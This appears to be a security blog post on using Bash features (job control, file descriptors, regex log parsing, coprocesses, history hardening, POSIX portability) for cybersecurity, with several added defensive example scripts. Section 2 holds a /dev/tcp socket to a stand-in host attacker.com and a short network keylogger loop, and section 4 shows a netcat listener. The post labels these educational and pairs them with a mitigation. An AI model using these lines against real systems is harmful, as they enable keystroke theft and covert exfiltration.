Mastering Bash for Cybersecurity: The Ultimate 214-Page Reference That Hackers Don’t Want You to Ignore + Video


Introduction:

Bash (Bourne Again SHell) remains the backbone of Linux system administration, penetration testing, and security automation. With over 200 pages of deep technical reference, the official Bash manual (Version 5.1) unlocks advanced process handling, redirections, coprocesses, and programmable completion—essential skills for any cybersecurity professional aiming to write stealthy, efficient, and resilient scripts for defense or ethical hacking.

Learning Objectives:

  • Master Bash process management, job control, and file descriptor redirections to build secure automation workflows.
  • Utilize Bash’s extended regex, arrays, and coprocess features for log analysis, intrusion detection scripts, and reverse shell handling.
  • Implement POSIX-compliant portability techniques to ensure your security tools run across Linux, macOS, and WSL environments.

You Should Know:

1. Process Management and Job Control for Ethical Hacking

Bash gives you granular control over synchronous and asynchronous command execution. In security work, this allows you to run network scans in the background while analyzing logs in real time.

Step‑by‑step guide:

  • Run a background job: `nmap -sV 192.168.1.0/24 &` (the `&` puts it in background).
  • List background jobs: `jobs -l` shows PID and state.
  • Bring a job to foreground: `fg %1` resumes job number 1.
  • Suspend a running command: press `Ctrl+Z`, then send it to the background with `bg`.
  • Disown a process so it survives logout: `disown %1`, or prefix the command with `nohup`.

Linux command to monitor process tree (useful for detecting hidden malware):
`pstree -p | grep -B 5 -A 5 "suspicious_name"`
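The same job control used from a script rather than an interactive prompt, as an added example that is not code from the post: commands are launched with `&`, tracked by `$!`, reaped with `wait`, and killed if the script is interrupted. The three commands are constructed placeholders.

```bash
#!/bin/bash
# Added example (not from the post): run several commands in the background,
# track them by PID, reap each one with `wait` to get its exit status, and kill
# anything still running if the script is interrupted. The commands are
# placeholders; in practice they would be scanners or log collectors.
run_parallel() {
    local -a pids=()
    local i status failed=0
    for i in "$@"; do
        bash -c "$i" &                      # & starts the job asynchronously
        pids+=("$!")                        # $! is the PID of that job
    done
    # Same idea as `kill %1` on an interactive job, but driven by PID.
    trap 'kill "${pids[@]}" 2>/dev/null' INT TERM
    for i in "${!pids[@]}"; do
        status=0
        wait "${pids[$i]}" || status=$?     # wait reaps the child and returns its status
        printf 'job %d (pid %d) exited %d\n' "$i" "${pids[$i]}" "$status"
        [[ $status -eq 0 ]] || failed=$((failed + 1))
    done
    trap - INT TERM
    return "$failed"                        # how many jobs failed (0 = all good)
}

# Three placeholder jobs: two succeed, one exits with status 3.
if run_parallel 'sleep 0.2; exit 0' 'exit 3' 'true'; then
    echo "all jobs succeeded"
else
    echo "failed jobs: $?"
fi
```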

Windows equivalent (PowerShell) for background jobs:

`Start-Job -ScriptBlock { nmap 192.168.1.0/24 }`

`Get-Job`

`Receive-Job -Id 1`

2. Advanced I/O Redirection and File Descriptors

Manipulating input/output descriptors is critical for data exfiltration, log manipulation, or creating stealthy backdoors. Bash allows you to duplicate, move, and close descriptors.

Step‑by‑step guide:

  • Redirect stdout and stderr to separate files:

`ls /fake /etc > stdout.txt 2> stderr.txt`

  • Merge stderr into stdout: `command 2>&1` (used often in cron jobs for cleaner logging).
  • Use a custom file descriptor (FD 3) to read/write:

`exec 3<> secret.txt` then `echo "malicious payload" >&3`

  • Close FD 3: `exec 3>&-`
  • Persistence trick: `exec 5<> /dev/tcp/attacker.com/4444; echo "HELLO" >&5` opens a raw TCP socket from Bash (dangerous, but educational for defense).

Code snippet for a basic keylogger over network (pure Bash, educational):

```bash
# Assumes FD 5 was opened with the /dev/tcp redirection shown above.
while read -s -n1 key; do
    echo "$(date) - $key" >&5
done
```

Mitigation: Monitor for unexpected open file descriptors with `lsof -p $$` inside scripts.

3. Using Arrays and Extended Regex for Log Parsing

Bash arrays and the `=~` operator turn the shell into a lightweight data‑analysis tool, ideal for parsing auth logs, firewall logs, or web server access logs.

Step‑by‑step guide:

  • Declare associative array for counting attack sources:

`declare -A ip_hits`

  • Read a log line and extract the IP with a regex (`BASH_REMATCH[0]` holds the whole match):

`if [[ "$line" =~ ([0-9]{1,3}\.){3}[0-9]{1,3} ]]; then ip=${BASH_REMATCH[0]}; fi`

  • Increment the counter: `((ip_hits[$ip]++))`
  • Output the top 10 attackers:

`for ip in "${!ip_hits[@]}"; do echo "$ip ${ip_hits[$ip]}"; done | sort -rnk2 | head`
    
Full script to detect failed SSH attempts from /var/log/auth.log (reading that file normally requires root):

```bash
#!/bin/bash
# Count failed SSH password attempts per "ip|user" pair.
declare -A fails
while IFS= read -r line; do
    # Group 1 is the optional "invalid user " prefix sshd adds for unknown
    # accounts; group 2 is the user name and group 3 the source address.
    if [[ "$line" =~ Failed[[:space:]]password[[:space:]]for[[:space:]](invalid[[:space:]]user[[:space:]])?([^[:space:]]+)[[:space:]]from[[:space:]]([0-9.]+) ]]; then
        user="${BASH_REMATCH[2]}"
        ip="${BASH_REMATCH[3]}"
        fails["$ip|$user"]=$(( ${fails["$ip|$user"]:-0} + 1 ))
    fi
done < /var/log/auth.log
# Print "ip|user : count", highest count first.
for key in "${!fails[@]}"; do
    echo "$key : ${fails[$key]}"
done | sort -t: -rnk2
```
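An added example (not code from the post) that ties the descriptor handling of section 2 to the parser of section 3: the log is read through a descriptor that Bash allocates with `{fd}` so stdin stays free, `invalid user` lines are counted correctly, and the descriptors the shell still holds are listed afterwards, which is the check the `lsof -p $$` mitigation above is after. The log lines are a constructed sample standing in for /var/log/auth.log; the function names are my own.

```bash
#!/bin/bash
# Added example (not from the post): count failed SSH logins per source IP,
# reading the log through a dedicated descriptor so stdin stays free, then
# list the descriptors this shell still holds so a leaked one (or a socket
# such as /dev/tcp) stands out. A constructed sample replaces /var/log/auth.log.
SAMPLE_LOG=$(mktemp)
trap 'rm -f "$SAMPLE_LOG"' EXIT
cat >"$SAMPLE_LOG" <<'EOF'
Mar  1 10:00:01 host sshd[100]: Failed password for root from 203.0.113.7 port 5001 ssh2
Mar  1 10:00:02 host sshd[101]: Failed password for invalid user admin from 203.0.113.7 port 5002 ssh2
Mar  1 10:00:03 host sshd[102]: Accepted password for alice from 198.51.100.4 port 5003 ssh2
Mar  1 10:00:04 host sshd[103]: Failed password for alice from 198.51.100.4 port 5004 ssh2
EOF

# Usage: count_failed_logins LOGFILE [THRESHOLD]; prints "ip count", most hits first.
count_failed_logins() {
    local logfile=$1 threshold=${2:-1} fd line ip
    local -A hits=()
    exec {fd}<"$logfile"                  # bash picks a free descriptor number for us
    while IFS= read -r -u "$fd" line; do  # -u reads from that descriptor, not stdin
        if [[ $line =~ Failed[[:space:]]password[[:space:]]for[[:space:]](invalid[[:space:]]user[[:space:]])?[^[:space:]]+[[:space:]]from[[:space:]]([0-9.]+) ]]; then
            ip=${BASH_REMATCH[2]}         # group 1 is the optional "invalid user " prefix
            hits[$ip]=$(( ${hits[$ip]:-0} + 1 ))
        fi
    done
    exec {fd}<&-                          # close it, or it shows up in audit_open_fds
    for ip in "${!hits[@]}"; do
        [[ ${hits[$ip]} -ge $threshold ]] && printf '%s %d\n' "$ip" "${hits[$ip]}"
    done | sort -k2,2nr
}

# List descriptors above 2 that this shell holds. bash itself keeps the running
# script open (usually fd 255); anything else is something the script opened.
audit_open_fds() {
    local path target
    for path in /proc/$BASHPID/fd/*; do
        [[ ${path##*/} -gt 2 ]] || continue
        target=$(readlink "$path") || continue
        [[ $target == socket:* ]] && printf 'SOCKET '
        printf 'fd %s -> %s\n' "${path##*/}" "$target"
    done
}

count_failed_logins "$SAMPLE_LOG" 2
audit_open_fds
```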
    

4. Coprocesses for Bidirectional Communication

Coprocesses let a Bash script spawn a sub‑process and maintain two‑way communication – invaluable for interacting with openssl, nc, or custom exploit payloads.

Step‑by‑step guide:

  • Start a coprocess: `coproc nc -lvnp 4444` (listener in background).
  • Send data to it: `echo "GET / HTTP/1.1" >&${COPROC[1]}`
  • Read a response: `read -u ${COPROC[0]} line`
  • Close cleanly: `exec {COPROC[0]}<&- {COPROC[1]}>&-`
  • Use case: automating TOTP code generation:

```bash
# Run oathtool in a coprocess and read the current code back from its stdout.
coproc oathtool --totp -b "$SECRET_KEY"
read -u ${COPROC[0]} token
echo "Current OTP: $token"
```
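The full request/response cycle with a named coprocess, as an added example that is not code from the post: write to `${NAME[1]}`, read from `${NAME[0]}` with a timeout so a silent child cannot hang the script, then close both ends and reap the child. The child here is a constructed bash loop standing in for a tool such as openssl or oathtool; `HASHER`, `coproc_query` and `coproc_close` are my names.

```bash
#!/bin/bash
# Added example (not from the post): a coprocess driven as a request/response
# helper. The child is a bash loop standing in for a real tool such as openssl
# or oathtool; the plumbing is the point: write to ${NAME[1]}, read from
# ${NAME[0]} with a timeout instead of hanging, then close both ends and reap.
start_hasher() {
    # Child answers each request line with the SHA-256 of that line.
    coproc HASHER { while IFS= read -r req; do printf '%s' "$req" | sha256sum | cut -d' ' -f1; done; }
}

# coproc_query REQUEST [TIMEOUT]: sets REPLY_LINE; returns nonzero if the child
# sent nothing within TIMEOUT seconds (e.g. a hung or fully buffered tool).
coproc_query() {
    local req=$1 timeout=${2:-3}
    REPLY_LINE=
    printf '%s\n' "$req" >&"${HASHER[1]}" || return 1   # HASHER[1]: child's stdin
    read -r -t "$timeout" -u "${HASHER[0]}" REPLY_LINE   # HASHER[0]: child's stdout
}

# Close both ends (the child sees EOF and exits), reap it, and drop the
# variables so the descriptors cannot be reused or leaked later in the script.
coproc_close() {
    local in_fd=${HASHER[1]} out_fd=${HASHER[0]} pid=$HASHER_PID
    exec {in_fd}>&- {out_fd}<&-
    wait "$pid" 2>/dev/null || true   # bash may already have reaped it; either way it is gone
    unset HASHER HASHER_PID
}

start_hasher
if coproc_query abc; then echo "sha256(abc) = $REPLY_LINE"; else echo "no reply from coprocess"; fi
coproc_close
```

Tools that fully buffer stdout when it is a pipe will not answer line by line; where coreutils is available, starting them under `stdbuf -oL` avoids that timeout.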
    

Security note: Coprocesses can be hijacked if their file descriptors are leaked: close both ends and unset the `COPROC` variables after use.

5. Programmable Completion and Bash History Hardening

Attackers often tamper with bash history to hide commands. Defenders can harden history behavior and even create custom completions for security tools.

Step‑by‑step hardening:

  • Prevent history spoofing: add to `~/.bashrc`

`export HISTTIMEFORMAT="%F %T "` (timestamp every command)

`export HISTSIZE=-1` (unlimited history)

`export HISTFILE=~/.bash_history_protected`

`chattr +a ~/.bash_history_protected` (append‑only attribute, root only)

  • Immediate logging of commands:

`shopt -s histappend`

`PROMPT_COMMAND='history -a'`

  • Create a custom completion for `nmap` flags:
    `complete -W "-sS -sT -sU -p- -A -T4" nmap`
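A defender-side check for the hardening steps above, as an added example that is not code from the post: it reports each control as OK or MISSING for the current shell and returns the number of missing controls. The function name is mine; the append-only test relies on `lsattr` (e2fsprogs) and a history file that exists.

```bash
#!/bin/bash
# Added example (not from the post): audit the current shell for the history
# controls listed above. Each control prints OK or MISSING; the return value is
# the number of missing controls, so it can gate a baseline or CI check. The
# append-only test needs lsattr and an existing history file; it is reported
# MISSING otherwise. The conditions are fixed strings in this script, which is
# the only reason eval is acceptable here.
audit_history_hardening() {
    local missing=0 entry label cond
    local -a checks=(
        'HISTTIMEFORMAT set (every command is timestamped)|[[ -n $HISTTIMEFORMAT ]]'
        'HISTSIZE=-1 (history is never truncated)|[[ ${HISTSIZE-} == -1 ]]'
        'histappend enabled (sessions append, never overwrite)|shopt -q histappend'
        'PROMPT_COMMAND runs history -a (written after each command)|[[ ${PROMPT_COMMAND[*]-} == *"history -a"* ]]'
        'HISTFILE is append-only (chattr +a)|[[ -f ${HISTFILE-} ]] && lsattr -d -- "$HISTFILE" 2>/dev/null | grep -q "^[^ ]*a"'
    )
    for entry in "${checks[@]}"; do
        label=${entry%%|*}       # text before the first |
        cond=${entry#*|}         # everything after it (may itself contain a pipe)
        if eval "$cond"; then
            printf 'OK       %s\n' "$label"
        else
            printf 'MISSING  %s\n' "$label"
            missing=$((missing + 1))
        fi
    done
    return "$missing"
}

if audit_history_hardening; then
    echo "history hardening: all controls present"
else
    echo "history hardening: $? control(s) missing"
fi
```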

Windows command to audit PowerShell history (similar):

`Get-Content (Get-PSReadlineOption).HistorySavePath`

6. Writing POSIX‑Compliant Security Scripts for Cross‑Platform Use

Portability ensures your incident response or recon script runs on any Unix‑like system (including macOS and WSL). Avoid Bashisms like `[[ ]]` or arrays if compliance is required.

Step‑by‑step guide:

  • Use `[ ]` instead of `[[ ]]`: `if [ "$var" = "value" ]; then`
  • Avoid `&>` redirection: use `> file 2>&1`.
  • No `source` command: use `. script.sh` instead.
  • Example portable script to check open ports using only POSIX shell syntax (`timeout` and `nc` are external utilities, so they still have to be present on the target):

```sh
#!/bin/sh
# Probe a fixed list of local ports; nc -z only connects and sends no data.
for port in 22 80 443 3389; do
    timeout 2 nc -z 127.0.0.1 "$port" && echo "Port $port open"
done
```
    
  • Test with `dash` (Debian Almquist shell) or `posh` on Windows.

Linux command to detect non‑POSIX Bashisms in a script:

`checkbashisms script.sh` (install `devscripts` package).
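The failed-login counter from section 3 rewritten with POSIX features only, as an added example that is not code from the post: no arrays and no `[[ =~ ]]`, just `sed`, `sort | uniq -c` and `awk`. The log lines are a constructed sample in place of /var/log/auth.log, and the function name is mine.

```sh
#!/bin/sh
# Added example (not from the post): the failed-login counter from section 3
# rewritten with POSIX features only. No arrays, no [[ =~ ]]: sed extracts the
# source address, sort | uniq -c does the counting, and a constructed sample
# stands in for /var/log/auth.log so this can be tried under dash or posh.
SAMPLE_LOG=${TMPDIR:-/tmp}/posix_sample.$$
trap 'rm -f "$SAMPLE_LOG"' EXIT
cat >"$SAMPLE_LOG" <<'EOF'
Mar  1 10:00:01 host sshd[100]: Failed password for root from 203.0.113.7 port 5001 ssh2
Mar  1 10:00:02 host sshd[101]: Failed password for invalid user admin from 203.0.113.7 port 5002 ssh2
Mar  1 10:00:03 host sshd[102]: Accepted password for alice from 198.51.100.4 port 5003 ssh2
Mar  1 10:00:04 host sshd[103]: Failed password for alice from 198.51.100.4 port 5004 ssh2
EOF

# Usage: count_failed_logins_posix LOGFILE [THRESHOLD]; prints "ip count", most hits first.
count_failed_logins_posix() {
    logfile=$1
    threshold=${2:-1}      # no `local` in POSIX sh: keep the names distinct instead
    # Basic regex only (no -E): \(...\) captures the address that follows "from".
    sed -n 's/.*Failed password for .* from \([0-9.]*\) port.*/\1/p' "$logfile" |
        sort | uniq -c | sort -rn |
        awk -v min="$threshold" '$1 >= min { print $2, $1 }'
}

count_failed_logins_posix "$SAMPLE_LOG" 2
```

Run it as `dash script.sh` or pass it through `checkbashisms` to confirm nothing Bash-specific crept in.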

What Undercode Say:

  • Key Takeaway 1: Bash is not just a shell – it’s a complete, stealthy programming environment. Mastering descriptors, coprocesses, and job control gives defenders and red‑teamers an edge without installing additional tools.
  • Key Takeaway 2: Security professionals often overlook bash history hardening and portability. A single misconfigured `.bashrc` or a Bash‑specific script can break incident response on an Alpine container or a FreeBSD jump box.

Analysis: The 214‑page Bash reference manual is a goldmine for cyber defense – from crafting immutable history logs to building real‑time log analyzers with associative arrays. However, many scan the manual only for basic looping. The real power lies in low‑level I/O and process manipulation, which directly translate to persistence techniques, data exfiltration channels, and quick win detection scripts. Undercode recommends every SOC analyst build a “bash‑only” toolkit – no Python dependency, pure shell – to ensure rapid triage on compromised systems where high‑level interpreters may be disabled or monitored.

Prediction:

As containers and serverless environments grow, Bash will remain the lowest common denominator for automation. However, we predict an increase in “shell‑aware” intrusion detection systems that monitor for abnormal descriptor usage (e.g., raw TCP from a script) and unexpected coprocess spawns. The Bash manual’s advanced features will become both a favored attack vector for fileless malware and a defensive standard for lightweight eBPF‑like monitoring. Expect future CIS benchmarks to include specific checks for `exec` redirections and history file append‑only settings.

Reported By: Héctor Joaquín – Hackers Feeds